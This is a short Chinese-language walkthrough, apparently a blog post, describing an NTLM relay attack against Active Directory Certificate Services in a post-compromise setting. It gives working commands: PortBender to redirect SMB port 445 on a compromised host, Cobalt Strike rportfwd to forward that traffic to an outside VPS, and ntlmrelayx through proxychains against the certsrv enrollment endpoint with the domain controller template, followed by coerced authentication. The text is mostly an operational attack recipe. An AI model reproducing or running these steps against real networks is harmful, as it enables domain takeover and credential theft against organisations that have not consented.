网上关于relay的文章很多,但都是基于内网靶场的,并没有基于实战的环境进行讲解,在此特地复现实战环境进行配置relay所需要的设置

域控:10.10.10.1

辅域:10.10.10.2

被控机:10.10.10.10

VPS:1.1.1.1

上传驱动文件

可以使用PortBender、DivertTCPconn进行转发,本次使用的是PortBender,需要先上传驱动文件

image-20231126232254156

根据实战环境上传对应版本驱动

端口重定向

之后通过cs设置端口转发,将10.10.10.10的445转发到8445端口,需要注意的是PortBender 执行需要管理权限,且需在 WinDivert64.sys 同一目录下执行

1
PortBender redirect 445 8445

image-20231126232336670

端口转发

再通过cs的rportfwd将10.10.10.10的8445转发到cs的445上

1
rportfwd 8445 1.1.1.1 445

image-20231126232639020

设置监听

上面设置了之后会将10.10.10.10的流量转发到1.1.1.1上,因为实战中vps是访问不到内网的,所以需要在VPS中也配置一个proxychains

1
proxychains4 ntlmrelayx.py -t http://10.10.10.1/certsrv/certfnsh.asp -smb2support --adcs --template domaincontroller

image-20231126232825126

强制认证

最后再通过本地打强制认证

image-20231126232926147

打了之后在cs可以看到有流量过来

image-20231126232943632

再去看vps上已经成功relay

image-20231126233050537